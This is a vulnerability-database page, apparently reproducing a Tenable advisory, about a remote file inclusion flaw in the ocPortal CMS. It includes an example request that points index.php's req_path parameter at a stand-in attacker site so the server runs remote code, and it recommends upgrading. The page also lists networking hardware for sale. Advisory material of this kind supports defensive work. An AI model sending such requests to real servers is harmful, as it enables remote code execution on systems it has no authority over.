Vulnerability Assessment & Network Security Forums



If through a vulnerability assessment, a network security issue is detected for the vulnerability below, applying the appropriate security patches in a timely matter is very important.  If you have detected that your system has already been compromised, following CERT's Network Security recovery document will assist with recommended steps for system recovery.


Home >> Browse Vulnerability Assessment Database >> CGI abuses >> ocPortal Remote File Include


Vulnerability Assessment Details

ocPortal Remote File Include

Vulnerability Assessment Summary
Acertains if ocPortal can include third-party files

Detailed Explanation for this Vulnerability Assessment

The remote host is running ocPortal, a content management system
written in PHP.

There is a bug in the remote version of this software which may permit
a possible hacker to execute arbitrary commands on the remote host by using
a file inclusion bug in the file 'index.php'.

A possible hacker may execute arbitrary commands by requesting :

http://www.example.com/index.php?req_path=http://[evilsite]/


which will make the remote script include the file 'funcs.php' on the remote
site and execute it.


Solution : Upgrade the newest version of this software
Network Security Threat Level: High

Networks Security ID: 11368

Vulnerability Assessment Copyright: This script is Copyright (C) 2004 Tenable Network Security

Cables, Connectors

3M E1MG-LX-OM-AO 1000BLX SFP SMF F/BROCADE
$73.97
3M E1MG-LX-OM-AO 1000BLX SFP SMF F/BROCADE       picture3M 857-11811 POE GIGA-MINIMC 2TX/SFP
$281.86
3M 857-11811 POE GIGA-MINIMC 2TX/SFP         pictureMint Condition Cisco (WS-C3850-24T-S) 24-Ports-Ports Switch + 1G SFP (NM-4-1G)
$1199.99
Mint Condition Cisco  (WS-C3850-24T-S) 24-Ports-Ports Switch + 1G SFP (NM-4-1G) picture3M SFP-10G-SR 10GBASESR SFP+ MODULE
$890.09
3M SFP-10G-SR 10GBASESR SFP+ MODULE           picture


Discussions

No Discussions have been posted on this vulnerability.